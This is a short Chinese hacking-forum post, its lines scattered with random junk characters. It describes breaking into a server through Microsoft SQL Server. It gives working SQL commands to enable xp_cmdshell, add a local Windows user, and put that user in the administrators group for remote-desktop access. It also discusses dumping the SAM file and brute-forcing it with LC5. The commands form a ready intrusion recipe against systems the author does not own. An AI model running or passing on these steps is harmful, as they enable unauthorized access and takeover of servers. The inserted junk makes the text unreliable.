saitojie

/ }/ L! {! G/ S* T
. d# a; G; w) p8 s  O$ Z

% H: R& ]5 W9 l  z; t于是开始找开启语句，对mssql的玩的少，不是太熟悉！
( E  {2 d0 O+ x2 u4 N( L0 j后来二少给我了语句，便去继续日之' B  K1 v6 d# {
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;+ }! O. L: y  r. Y
1为开启，0则为关闭！
% q# Y( R5 ~3 A$ E0 ~' \+ G然后执行, L0 Y( w5 @" L' j. b8 l
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add'
9 ~' D! ]2 S: F- e% ~9 E/ Q7 X, }即可
* n0 H7 T% C" i( o/ Z( i6 b4 V回过头去看看，发现用户已经成功添加上了！
9 t& e) M* u8 E2 j5 t2 t/ m. R

3 ]" `* u+ I9 W  j. |& m+ c
我就不明白BKK了，这个地方，你都已经加上用户了，为什么不直接加入到管理组里面，连接服务器的3389呢，为什么还要去下他的SAM，还用LC5去爆力破解呢！~~~~不明白！~~~4 D* o& J. _0 S: e3 R; B3 Y2 p3 c
EXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add'，难道是因为他的3389做了登陆用户的限制？